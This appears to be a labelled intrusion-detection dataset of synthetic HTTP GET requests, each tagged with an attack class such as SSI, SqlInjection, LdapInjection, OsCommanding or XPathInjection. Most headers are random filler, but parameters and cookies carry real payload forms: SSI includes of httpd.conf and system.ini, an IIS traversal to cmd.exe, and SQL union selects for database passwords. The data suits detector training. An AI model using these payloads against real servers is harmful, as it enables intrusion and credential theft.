TE: chunked;q=0.0
Trailer: Accept
User-Agent: 8l9r6ntqhi (bV8l6bXIr; fTHS@T; 3-sGVJJ4; saXl5tP; p00z665QCv)
UA-Disp: 0550,3953,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7709x7356
Via: 7.0 www.zsiha.jpeg, HTTP/2.0 203.199.100.136
Transfer-Encoding: identity
Upgrade: anRsj/9.4, 58agtG/6.3
Warning: 662 www.deregsns.gif:97 "htvam7uh0EcerdZsfa" 
X-Forwarded-For: 0.228.238.16
X-Serial-Number: 7677444389981478018
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38676
Start - Id: 40379
class: SSI
GET /eUn/esgnlontjtqPeaen/qvarcirOmdp6/thI5m6/hzhf3_P_nOkXn149/omG88r1UiRHM6ra/LaHWAs/gcZtmpiZQnNornc/lfhotp6pavlafamn.bin?cc=3&ftlseEeaWreaasU=LygrragxczsiAt7p&9ictr=fd%245vrtStselectr&7niliil0R=sock_stream9divscriptqiiej%26o%3Et%26&7sneo5s=113&dsacoanmuihtow=0aYa&er0srimHtlhooe=+gmao+%2Bopen&hm2owegotd=ralk2kaeb%28t&yrosyBetoetnTM=16367039&BLlinkLcorx-M=rhc1eheh&84a=%7Ekn&nAqerc=106531&edaeweienho1=l+ HTTP/1.1
Host: 94.48.251.242
Connection: keep-alive
Accept-Charset: x-mac-turkish;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.0
Cookie: 3aBSuAc0@RiS=<!--    #include virtual="c:\winnt\system.ini"  -->;jdatueEfnspha=ei5hOe1rtUi;lor9s=wexech>7reboot.ini;4tBzO6deletewV=nocdewiteu1noePzm;dneg=heds5sia
Cookie2: $Version="44"
Date: Thu, 04 Sep 08 05:12:57 CET
If-Match: *
If-Range: Thu, 01 Jan 09 01:43:09 GMT
Referer: /tenxtd/vwbadhkP/edtppnis/ncoekl/ueajontc.conf
User-Agent: Mozilla/2.4 (compatible; Konqueror/1.2; Win 9x; ethae2e)
X-Serial-Number: 976386691609
----: ----------------------------------------------

null

End - Id: 40379
Start - Id: 42183
class: SqlInjection
GET /lr/xfaVPw8smwsT7/bmmochaH1xG@fncF/7xDautoexecrvartTD/ba7mea/cerzS-pYS6aJ6fb/w-1e/Iinsertd0vYF670NcA71/z8M.x/DetBtsEtchttn9r/enaelan.mdb?hdsnoemToy=oerjrm&irh57=27&hZbFvo=aPpcneshutdowng%24crSx%5Dscripts&tneq0=sfroms&Actiaslzmahsk=slsrsennj%2F8Luf&de6ry5ye=uaan6neb%3AthtpassgaEutb&YCintHformG0catL=taiA3Pnwn2%5Csechog&0ehi=%3B++++exec++++get_cust%28++%27x%27%27+union+select+++++object_name%2Cobject_type%2C%27%27x%27%27+from+++++user_objects+++++where+++++%27%27rKennltha%27%27+++%3D++++%27%27++++%27+++%29%3B&ahaheie=naEu&aaXtb=aainsertmochaall HTTP/1.0
Host: www.gyht5l.cz
Connection: close
Accept: image/*, text/html;q=0.2, image/*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: hmtrshrn-1ep;q=0.5
Cache-Control: max-stale
Client-ip: 171.126.113.10
Cookie: nYxgXoK=guL-jA;neE=89021;m3Achwmbrio=03663;sestt54ti=lrhsit)a1aDswE sa05r;clesbe=oa9shguci
Cookie2: $Version="16"
Date: Thu, 14 Apr 05 22:55:07 GMT
ETag: "VKFBYpcbywJ_iX8q6h."
Expect: 9fto=lKrtw;ieBn=ntteqL
From: tnetRvi@fedacee.com
If-Modified-Since: Mon, 25 Feb 08 01:52:50 GMT
If-Unmodified-Since: Sun, 19 Mar 06 01:42:23 UTC
If-Match: "0QUaAY9PTPx.rFLEA6"
If-None-Match: "tjFvIU@i0xY0kLmb5TIW"
If-Range: Tue, 28 Jun 05 23:32:10 GMT
Max-Forwards: 049
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: tttnT asArsom=lnlse
Range: 1010-
Referer: http://www.iikkeui.fr/ztics/sweoohs/flsAttt.mpeg
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/4.8 (Windows; U; Win98 3.1; gt-se; rv:9.6.9) Gecko/44835633
UA-CPU: PowerPC
UA-Disp: 466,6159,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 124x5537
Via: wh3i86/8.6 84.214.31.249, 6.6 152.243.157.211
Transfer-Encoding: compress
Upgrade: iia/8.8
Warning: 601 194.137.96.43 "gotieoa7eticdpyar6l2" "Thu, 01 Mar 07 08:53:20 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 41681316983855974
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42183
Start - Id: 37256
class: LdapInjection
GET /hnAooel5ioesdiaean9s/aeoarismwet/8aje4/0aQINMYPGd440FQCeMy/6ilEs/kIJE/7vbv/kiss/OsZBrw5U/etNwpntesplrliko.htm?segbHu=eujitosyC7got0&et=2946&Emea=Ls&eeasf=%27edocument&efateik=5505804&group byuxKbCrqa_Pcmd=%29++++%28+++%7C+%28astxu%3Darda*%29&liwet7na=3lss&iac77tcn=e&7esi8=ioytzej HTTP/1.0
Host: www.lrEr.st
Connection: oienlit
Accept: text/html, text/html;q=0.1, image/*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.6
Accept-Language: e-oe, Sm-HnUoih;q=0.5
Cache-Control: no-cache
Client-ip: 140.231.249.168
Cookie: ameiir=95799;cj=35yynhrn;2esrolep2pp=e9zdJ1i5+evs
Cookie2: $Version="3"
Date: Sun, 28 Sep 08 04:06:04 CET
ETag: W/"bNc0uNmABEHOP3zCY98w"
Expect: 100-continue
From: tlclo@pOIec.be
If-Modified-Since: Thu, 07 Oct 04 12:39:52 CET
If-Unmodified-Since: Tue, 12 Feb 08 07:18:53 UTC
If-Match: "sdQxheFOifSdZEC2u"
If-None-Match: *
If-Range: *
Max-Forwards: 3691
Pragma: aooal=hmfeui
Proxy-Authorization: oetuts 0iernty=iio4tep
Authorization: Basic aGFkc3JodDozb3RuTw==
Range: 690936-,5769-,6-
Referer: http://i5sHwi.com/tilni/e7gyuas/siih59em/8ntdme/Mg7o.mspx
TE: trailers,gzip;q=0.3,deflate
Trailer: Referer
User-Agent: Nebh0ihbehtueAasirl4
UA-CPU: 68000
UA-Disp: 785,4501,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1371x144
Via: 9.9 www.eine.html, 4.7 www.iexT.jpg, 0.0 www.eteetq3.shtml
Transfer-Encoding: identity
Upgrade: useuq/7.4, rtiw1o/5.5, ltnag/4.9, laahat/9.2
Warning: 419 57.72.62.225 "8qea3ieagcspza3ee" 
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37256
Start - Id: 43781
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.1nineuhi.ch:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-4, x-mac-chinesesimp
Accept-Encoding: deflate, identity;q=0.1, deflate;q=0.9, gzip, compress
Accept-Language: ua-eeneeh;q=0.6, bihdtlns-w2s;q=0.9, rr-teila, 7s-5lo
Cache-Control: min-fresh=31950
Client-ip: 111.17.94.212
Cookie: bgin7im=asl"apacsdrop"atO/ 
Cookie2: $Version="9"
Date: Sat, 14 Apr 07 20:17:53 CET
ETag: W/"AMC5ZOlrnU7y1Mew"
Expect: ursi
From: nrfbhece@hbiiwgu.org
If-Modified-Since: Mon, 02 Aug 04 23:35:13 CET
If-Unmodified-Since: Fri, 24 Apr 09 17:31:31 CET
If-Match: *
If-None-Match: "hG_CvAt8556WPghei"
If-Range: Mon, 09 Aug 04 08:31:48 CET
Max-Forwards: 1
MIME-Version: 7.8
Pragma: hria=r3ttds
Proxy-Authorization: Digest opaque="leSssie"
Authorization: Digest response="C9aF4EC9f3c9b9EB8a5daF58b0fEdBE6"
Range: 10571-03
Referer: /et5N8zA/lrenap.gz
TE: deflate;q=0.1,trailers
Trailer: From
User-Agent: Mozilla/2.0 (compatible; MSIE 8.6; Open BSD i586; uesasdhcdo; fsbd6moaol)
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 877x3920
Via: 0.1 84.137.108.135:115, 7.5 www.al0m.js, FTP/9.4 www.tigtruei.html:36627
Transfer-Encoding: gzip
Upgrade: I0e/5.0, he1tw/5.8, cacYt/4.6, L6nei6/8.5
Warning: 658 www.Hscsmktn.js:3 "stszn923barrtxs" "Thu, 16 Oct 08 07:29:39 UTC"
X-Forwarded-For: 144.180.167.11
X-Serial-Number: 026026261334603
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43781
Start - Id: 40290
class: SSI
GET /43B/tnhanltgcwtouws/F0caWeVX@dropA/eIwK7vMVyi/icrza/4B1xim2Djmhm.gif?hiibqbt=56&eoneea=2220975&elts=q%3Cea&hgmwermAEju=2&nhlnua5Itr9o=9n&dont=909&rBr=54&1e0irn=ac7p5t7&bodyyOi4g=rGJQPCRCD8&stoEftioPesedit=ramslaeNissar&eHhte=4&nufrtUqwsF=%3C&Nbig=%3C%21--+++++%23exec++cmd%3D%22c%3A%5Cprogra%7E1%5Csoarptrad%5ChoAetooia%5CtogsScs.exe++++d%3A%5ChO%5Cwww.trnineti.org%5CFeetsA6o%5Cdatabase.mdb+%2Fx++exporttofoxpro%22--%3E&arianynraDo=10&ne=eot HTTP/1.1
Host: www.hdtpna.gov:80
Connection: close
Accept: audio/basic;q=0.1, image/gif, video/mpeg
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: mctiuw-hdun;q=0.5, hl-okx, s-aenus;q=0.2
Cache-Control: no-cache
Client-ip: 233.182.232.153
Cookie: leeisrU4a=bMw8-5r1u2_;adfdhv6M=~ser@;psst=dyJ2wiIA;hcdheAHneqtNzi5=teglo3f4i;thp9th=nebin4boot.inifZAkm'j;rnsbva=hhl2sgrzexeoki
Cookie2: $Version="394"
Date: Sun, 11 Jan 09 07:37:00 CET
ETag: W/"4aEoEJ15un6CZuvm"
Expect: bezs
From: sinl@n3biht.ch
If-Modified-Since: Wed, 26 Dec 07 10:06:37 UTC
If-Unmodified-Since: Tue, 28 Dec 04 19:03:02 UTC
If-Match: "ChbBg84reec1gBQ5Htl"
If-None-Match: "5BC@s8Xh_xvT25ly"
If-Range: *
Max-Forwards: 7867
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: oeos goaweqW=tqMehbrx
Authorization: Digest uri=/enaal4i/2shfn/bVreRy/hizeee/hehahtqL.tar.gz
Range: 37574-,839789-
Referer: /ahmht/l2nta/oaIqdtc.mpg
TE: chunked;q=0.9
Trailer: Via
User-Agent: Mozilla/1.5 (Machintosh; U; PPC 8.9; ey-oc; rv:8.1.6) Gecko/95963436
UA-CPU: MIPS
UA-Disp: 371,473,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2184x777
Via: 4.1 www.te1aciqr.jpg:36661, 6.5 118.17.15.185:35, FTP/8.4 30.74.40.227:8409
Transfer-Encoding: compress
Upgrade: rdr/9.6
Warning: 559 www.x4kdcw.js "6b1la22lnngto" 
X-Forwarded-For: 154.142.43.224
X-Serial-Number: 62707296438769057176
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40290
Start - Id: 39531
class: SSI
GET /kdloaii8ans6igt/f7wemei3o/ti7aHjf3hF9mtw_.jsp?8ceui8q=0&2oGE8=-0ooenph-aEv8xoEto&mno=w.y&jcfRANWBQc=21&lnoi=La&inenxZops6t=0&tf5=ni%7Csda%5Dobject&tm5sa=m2OjhlRM&in=s&wahlodnltIneoir=0&Trrusieh5eejohe=r.PMT&eutnnmub=dih7enedb7tt2e&cotytaDTeseene=ascrcta0&vst=ei2wca%3Cindsystem0&insoelhqse=arhPaerhtep HTTP/1.1
Host: www.am1qO.net
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.0, identity, deflate
Accept-Language: *
Cache-Control: only-if-cached
Cookie: y1XDd@bWU=tP2oW;osAtbs=nFa;i7=7;sryyefqhip=97;ree=<!--   #include  virtual="/etc/httpd/httpd.conf"    -->
Cookie2: $Version="04"
Date: Fri, 20 Apr 07 06:28:56 GMT
ETag: W/"aIEDtxbbWxK1yiYrk5Ei"
Expect: 100-continue
If-Modified-Since: Mon, 22 Feb 10 11:23:12 GMT
If-Unmodified-Since: Fri, 26 Jan 07 15:36:00 CET
If-Match: "@iB2z4sfLEfgGsit"
If-None-Match: "m@mlaKPAwhK7fqQ1k5"
If-Range: Thu, 26 Apr 07 15:58:23 CET
Max-Forwards: 91
MIME-Version: 7.0
Pragma: rbfnpssi='egl'
Authorization: neSo syPaam=nnzsnb
Referer: http://www.ictcsh.com/nmeciopi/i71ohIja.css
TE: chunked;q=0.5,chunked;q=0.5,gzip
Trailer: If-Range
User-Agent: Mozilla/5.7 (X11; U; SunOS sun4u 2.6; en-no; rv:1.6.8) Gecko/45134894
UA-Disp: 070,9720,32
UA-Color: color16
UA-Pixels: 939x764
Via: 7.0 www.rnatau.html:6372, Lrzuo/0.5 www.efshx.jpeg, 0.5 www.nm0noban.gif
Transfer-Encoding: gzip
----: ----------------------

null

End - Id: 39531
Start - Id: 37204
class: LdapInjection
GET /nuWyD0N4/s3lKjLuDOvQS/lcnsdiins/shfr5aheolosdpypd/s4uwfyt/qh0gD_ssFselqP/ExlTurhqpux/nn4somhl8okd/diEtERsD2zvsN/h@jE4gz/enneeTsehw9m6poJH/eheh7js5.exe?vmtioreiillornf=a%2B%40%26r+o2ln&nokRiaohpd=5730482&4@pKwindow.openaA3=2411&gnor3rahpmi4eG=1t%3Ch%29i5r+hnb&i7t=h4%29&cup0gqintek31=%29%28++%7C++++%28++++cn%3D*o++%27brien*+%29%28mail++++%3D*o+++%27brien*%29++++ HTTP/1.1
Host: www.ydmrent.ch
Connection: keep-alive
Accept: */*
Accept-Charset: koi8
Accept-Encoding: deflate, compress;q=0.5, gzip;q=0.5, gzip;q=0.0
Accept-Language: qoliUsl1-i;q=0.2, si-8, k-ag, n-ewzos;q=0.8, 8-h
Cache-Control: no-transform
Client-ip: 163.27.72.204
Cookie: Esoclanua=etrrmneOnttqgeia;access_logUvsC4M9y=0h;3an5ltrtnjae=i;cse=54834;bn=3;ggliwe8sifo7=n-cqsc
Cookie2: $Version="690"
Date: Thu, 22 Sep 05 12:55:38 GMT
ETag: "Cq6r9kXQ5YmgE6FrHz."
Expect: 100-continue
From: eeae@rreIhhhha.biz
If-Modified-Since: Thu, 04 Sep 08 19:47:21 GMT
If-Unmodified-Since: Sat, 04 Jul 09 09:00:24 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 2.5
Pragma: shmoapr8=phcsroay
Proxy-Authorization: Basic ZHdiZFdlOm9kaWdlVWF0
Authorization: Basic ZWZhczpkaTJtaHc=
Range: 605-286224
Referer: http://www.Yfodsg.ch/ehryshrw/6oii.php
TE: deflate,gzip,chunked;q=0.9
Trailer: Trailer
User-Agent: Mozilla/1.1 (compatible; aq17as7; Solaris; naklda4st2)
UA-CPU: Sparc
UA-Disp: 4047,0109,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0874x8291
Via: 5.4 46.238.101.70, 1.4 223.164.218.252
Transfer-Encoding: identity
Upgrade: qsf/6.6, r6nf/1.0, nSh/1.8, fseh/4.5, encob/8.5
Warning: 515 www.RAeg.png "aholxfeqpy" "Wed, 27 Jan 10 22:49:12 GMT"
X-Forwarded-For: 209.47.70.154
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37204
Start - Id: 39670
class: SSI
GET /jZyMWoqX76JB_A/tNmOoep/k2DG.qKW7jnBIM/sesnreu7e/Prcp.exe?WXarH_F=dtn9lib&sh8ole15no=4&zWpeR5=%3C%21--++++%23include++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22++--%3E&x4Mmocha=igtnoehTnrnbsDi6t&tjags4f=hssfPgeSeumoe2 HTTP/1.0
Host: 38.231.121.249
Connection: e0ed8C4a
Accept: video/*;q=0.1, application/postscript;q=0.2
Accept-Charset: iso-8859-7;q=0.6, windows-1251;q=0.5
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.6
Cache-Control: viSe=c
Client-ip: 4.2.127.169
Cookie: A6-childF_Fndh=(ta5indu;ct5execautoexecFImp3P=ihc;ftpcxotlsihr=486873
Cookie2: $Version="57"
Date: Mon, 04 Feb 08 14:55:23 GMT
ETag: W/"29HGJ_DdyE7QI-wj"
Expect: 100-continue
From: l5vtEst@R8caTefna.fr
If-Modified-Since: Wed, 06 Oct 04 07:47:09 UTC
If-Unmodified-Since: Mon, 25 Dec 06 14:55:22 UTC
If-Match: *
If-None-Match: "GNA9-AmAhp8X3WPux9"
If-Range: *
Max-Forwards: 5
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: n0eu ard9hoW=9os6s
Authorization: yrauwn ng8rwsu=eto9ysu
Range: -7190
Referer: /odhgiric/fssd8/sheeed.nsf
TE: trailers,deflate
Trailer: Upgrade
User-Agent: Mozilla/6.0 (compatible; lrra4a; Linux i386; ustaixtM)
UA-CPU: 68000
UA-Disp: 0266,938,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8969x195
Via: EEs/6.1 www.Laia4.html, jlca/4.8 162.61.180.157
Transfer-Encoding: identity
Upgrade: keeao/1.8, ytF/7.1
Warning: 207 241.47.196.151 "ksiDodurbEgloiwst8" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 919920115
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39670
Start - Id: 41253
class: SqlInjection
GET /3k/elV@q3TOGkkGb7dFEtqk/ond/iolmeri/stvUhHx6nW0uh.Aap/brZjmhiVWoe.eXi3/0sHXhqB4pin/-IyZ/uyt8TqT.FB2B4.shtml? HTTP/1.1
Host: 81.45.112.113
Connection: rt2esvbt
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: max-age=97
Cookie: S8AcD8bfn0=78944559;legucaiH=yCvy;hahhrocJuel=46343;4aCCTaphttpty=a3k;a3=Uimbib;5xswdsotbwabe=823979
Cookie2: $Version="81"
Date: Sat, 15 Oct 05 13:30:26 CET
ETag: "Xj42@dWTGsmYvJV1"
If-Modified-Since: Thu, 23 Mar 06 06:13:07 CET
If-Match: "8Cry41RMJwBOUNK"
If-None-Match: *
Pragma: eq9h='msmh'
Referer: http://www.sdeieoya.org/ueyxh/dee9iea/ts0nth5.tar
User-Agent: 'union    select    PASSWORD  from   DBA_PASSWORD;--
Via: 7.6 www.9srio.shtml, FTP/4.9 255.127.70.106, 6.2 www.nlurtooi.html
Upgrade: ehoc/7.5

null

End - Id: 41253
Start - Id: 35700
class: XPathInjection
GET /zts/d-I_e/dusxz0Fk8fG3VzeUDh.U/rDwBbhebPbwuuino/w4l6tc8e@4ICQJSyP/ydrunechDTve/iae0fidlmi.png?LELCN6QMi=enorFt&e9htc02=bEaienTo%27++++or++6+++++%3C++count%28path%2Fchild%3A%3A*%29++++or+++%27Sspde%27++++%3D++++%27&rqS5iq=sua&ss2zcaaaatcxnBD=eOtvGq.bQz HTTP/1.1
Host: 193.144.82.17
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.3
Accept-Encoding: gzip;q=0.4, identity;q=0.3, identity, deflate
Accept-Language: *
Cache-Control: max-age=347
Client-ip: 87.168.72.128
Cookie: goprlu=nnsnwi9wosce;alys=eolauvE6ftby
Cookie2: $Version="0"
Date: Sat, 10 Sep 05 17:39:44 CET
ETag: W/"3V3tBdlDozt7JvZcGC"
Expect: aebhq
From: xcsXifnE@tneljth.ch
If-Modified-Since: Wed, 11 Jul 07 16:10:40 UTC
If-Unmodified-Since: Mon, 04 Apr 05 09:11:15 UTC
If-Match: *
If-None-Match: "rlzk8rqxdGrIZMUJF"
If-Range: *
Max-Forwards: 5360
MIME-Version: 4.6
Pragma: Qns=8p8b8
Proxy-Authorization: ndsOth k8so=nlmc
Authorization: NTLM ZWtucHBJbW50dHN0YnJlZ2Nub3RpZUVjZXUyZGE5Zzh5c1I=
Range: 5225-,8-9,1-
Referer: http://www.dg7ns.org/ohehe8e/i4ters5y/oa4uee3.dll
TE: chunked,deflate;q=0.6,deflate
Trailer: If-Range
User-Agent: xeehzi/5.8.6.6
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 656x763
Via: FTP/3.8 176.165.200.193
Transfer-Encoding: gzip
Upgrade: dOa8/7.7, iisei/3.4, ylle/7.0, laix/9.7, vbeu/5.2
Warning: 134 179.206.30.120 "oxtqt" "Tue, 25 Sep 07 03:29:34 CET"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35700
Start - Id: 41728
class: SqlInjection
GET /ftVfvN4D/MYVY105Wlsk7/4QZ48j.tiff?WLkPhMLg=h+Tn%3B%2F+t&fqyu9aarom3ey=heesb%7E%5DhsnaGiscz&updateo74oXXP-6O=4241&sLsrhqso8wo8sh=OR+%273plao%27+++++%3D+++++%27+++++%27&ro7rrv=vaikE+a+idod%26B6iwp-+ae HTTP/1.0
Host: 145.2.14.56
Connection: close
Accept: text/*, video/quicktime, application/rtf
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.2
Accept-Language: my1u-ct, ucz0h-eaoe;q=0.7, lt-se;q=0.3, yr1-eobEbht;q=0.0, r-taoceaz;q=0.1
Cache-Control: no-cache
Client-ip: 130.12.152.206
Cookie: _WoQ=idai;i7Qeufemcsst=gHi1se1znounnlag8;o8Hh9t4jM@=eOpjrt7t5C34t1h
Cookie2: $Version="023"
Date: Fri, 18 May 07 24:43:02 UTC
ETag: "x-y4MP-XTys@LWVZvO_A"
Expect: 100-continue
From: weLnae2@eCsehh7ca.cz
If-Modified-Since: Thu, 06 Dec 07 02:13:36 UTC
If-Unmodified-Since: Tue, 01 Apr 08 21:28:37 GMT
If-Match: *
If-None-Match: "GXrGnNJe9dDO4fka"
If-Range: "@Y6hzZv2wbBivlH"
Max-Forwards: 073
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic cmllaHR0YnQ6dHJlMg==
Authorization: Basic bHU2dGQ6bWN0Tndp
Range: 111-,-67748,-483206
Referer: http://l7niyIp.de/6rsiryn.css
TE: gzip,trailers,deflate
Trailer: Via
User-Agent: ddue (hc8h1.JV; oT-E6V; dqXdcci; 8RTP40cJ)
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 3172x1738
Via: HTTP/3.2 251.85.107.240, 6.7 47.169.235.190:0146
Transfer-Encoding: lrso; hnzirn=Erekhe
Upgrade: kmeyp7/6.4, oab/2.7, peZa/7.9, tihsau/8.6, rstvvt/0.5
Warning: 132 www.gls0.js "sseahcsnj2f1dtnEm93r" 
X-Forwarded-For: 152.105.208.9
X-Serial-Number: 775994
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41728
Start - Id: 37436
class: LdapInjection
GET /mocku/I_6.png?eeeolDu=pacree&Unhuecni=sttarOotSo&r1og=a5+r%3D&3ec=+%3F&yaot=ta%27&jqm5FA7Nc=iuIi7i1omr&lveahere0=VetcmeD&nAaHg=sa3id&uEtc0HLDohxaa8s=neLkeeeieehetc%3Ce&UvarescriptpnSJ8db=d6bys8I2zacua&env=inputah%3Foxall9emelibekbinco%3F&ohfrogn7hpaeege=eoerseoo%25%40eEb&eynsehrpulGnap=zCh0_o&ncbsroeiho=uh%29&ibiadecmcpu2iw=d7includesi%2Bjtien%2Fehtreplace HTTP/1.0
Host: www.eteudo7.st:80
Connection: uh4trg
Accept: video/mpeg, video/quicktime, video/mpeg;q=0.4
Accept-Charset: iso-8859-7, iso-10646-ucs-2
Accept-Encoding: *
Accept-Language: m-l, eeu-oiak, drdOl-lfEOH;q=0.9, 8br-o;q=0.5
Cache-Control: no-cache
Client-ip: 84.5.229.156
Cookie: 56rcs8hlNl=c6as)(    |    (ip=*)
Cookie2: $Version="923"
Date: Wed, 09 Mar 05 10:15:23 CET
ETag: "IHoq4-fGKUeObyET@Gzj"
Expect: ylUilo=oi9uetlb;1oce
From: arSeni@esqqy2etgc.cz
If-Modified-Since: Wed, 14 Jul 04 12:15:13 GMT
If-Unmodified-Since: Thu, 16 Jun 05 04:21:40 UTC
If-Match: "bzzn2xH7rKfJwRC-Y"
If-None-Match: *
If-Range: Tue, 27 Mar 07 24:21:30 CET
Max-Forwards: 22
MIME-Version: 0.7
Pragma: noUt='eltyiren'
Proxy-Authorization: nlct tngmes=oZoE0u
Authorization: Digest nonce
Range: 1-644,5-,4025-
Referer: /nnrt1Oq/hwvfwi/cNS3eo0/thehtuE.php4
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: rss2nr3A/6.2.7
UA-CPU: Sparc
UA-Disp: 160,5878,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7873x595
Via: 0.3 193.34.214.69, HTTP/7.3 183.224.101.210:0556
Transfer-Encoding: gzip
Upgrade: srec/2.4, wspc/1.9
Warning: 992 244.100.160.53 "ecaeadaIbs4lSi2wtnu" "Thu, 18 Aug 05 11:48:21 CET"
X-Forwarded-For: 218.58.31.100
X-Serial-Number: 973264
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37436
Start - Id: 38897
class: LdapInjection
GET /gpfrbG/dia4asqm5enzati/cpYPx3AX93Wof1yNh0/hJKUYcJ4z24/6qinsertthttpsEZ/bL0YoSOieiB/iKG9o_1VOIK1RlsOIb.html?ww=gtmpc2nodebinsoudtlo&IOd0Tya=nm+nt&ll=eteqh%29%28%26%28objectClass++++%3D+++nei*%29&bnWtpnmFsy=39145&jevaljQTX.f=sFicdk&4Eqhlen0ne=7 HTTP/1.0
Host: www.sntknN.st:9999
Connection: close
Accept: image/*
Accept-Charset: *;q=0.4
Accept-Encoding: gzip, compress;q=0.7, compress;q=0.9, deflate;q=0.9
Accept-Language: *;q=0.4
Cache-Control: min-fresh=580
Client-ip: 191.208.34.138
Cookie: uit=83820786;Rdeoewaf=nAuime
Cookie2: $Version="375"
Date: Sun, 17 Jul 05 06:49:53 CET
ETag: W/"vf-qQST2l5aPOHxwweG3"
Expect: 100-continue
From: w08rh3@rpehekeyi.com
If-Modified-Since: Wed, 19 Nov 08 04:45:55 GMT
If-Unmodified-Since: Mon, 30 May 05 24:22:50 UTC
If-Match: "nLBIXCmGCcmnXuq"
If-None-Match: *
If-Range: Mon, 06 Apr 09 23:15:40 UTC
Max-Forwards: 8218
MIME-Version: 8.9
Pragma: tasatyn=suraom
Proxy-Authorization: Digest uri=http://FaaeNvi5.de/eb1i/frntyteh/rtgq/thmu0aeu/3ufhnjt.bin
Authorization: umsne eH3eel=ctoh
Range: 15934-,799-8058,-81465
Referer: /ltSn7yii/geedd/sNx7ne6.jpeg
TE: trailers,deflate;q=0.0
Trailer: Transfer-Encoding
User-Agent: besgc/2.0.5.4
UA-CPU: x86
UA-Disp: 117,0811,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7477x4477
Via: HTTP/5.8 247.78.129.28
Transfer-Encoding: gzip
Upgrade: v4ALI/5.0, wpsz/7.3
Warning: 103 16.254.149.96 "EttkoaUmriatd4" "Thu, 02 Mar 06 19:59:35 CET"
X-Forwarded-For: 250.105.147.78
X-Serial-Number: 9521103915785136495
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38897
Start - Id: 35668
class: XPathInjection
GET /e2/svMfH3QN4ETTLI/sW3peZ7xmYkMiyo/h5RzhC-3jIBa3B5znWf/1mcanonan.png?uhstttdLsekyol1=e1W0Zxk&exnwd=o9oyless8i&KyrmsZ5hy.like=idn39c&tter=5&9M2QM3=492&5FxmliKOJ=gPIOoH1&ik1anouh=bix0ee+r&rOJ-UpMtv=24er%2Fb%2Fy%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D2%5D+++++%7C++++y%2FcA%2FeNn8%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D079%5D+++or++++%27edhotye1%27++++%3D++++%27&xscodsrlrn7Boi=+%3CIlykiw&njetsHc05h=%5Dr&c8ba9keioeensec=Levale1%254oiigftpgs%7Cbetweenpc&1M7lhnal8c=6 HTTP/1.1
Host: www.nsyr.st:62918
Connection: 3ctu
Accept: image/*, text/*
Accept-Charset: iso-8859-9;q=0.5, iso-8859-6, cp-950
Accept-Encoding: gzip;q=0.2, gzip;q=0.0
Accept-Language: awsn-e, pu-na2ril;q=0.9, ea-asw6s
Cache-Control: no-cache
Client-ip: 68.97.141.43
Cookie: fzmng0=3;iaV2tvd=2836674512;4d=9ei3
Cookie2: $Version="890"
Date: Mon, 28 Jun 04 07:37:59 UTC
ETag: "e3pjb@j9ocdjkSZAayeI"
Expect: e8c6tipe
From: tgaZ6rhn@dneNoaa.uk
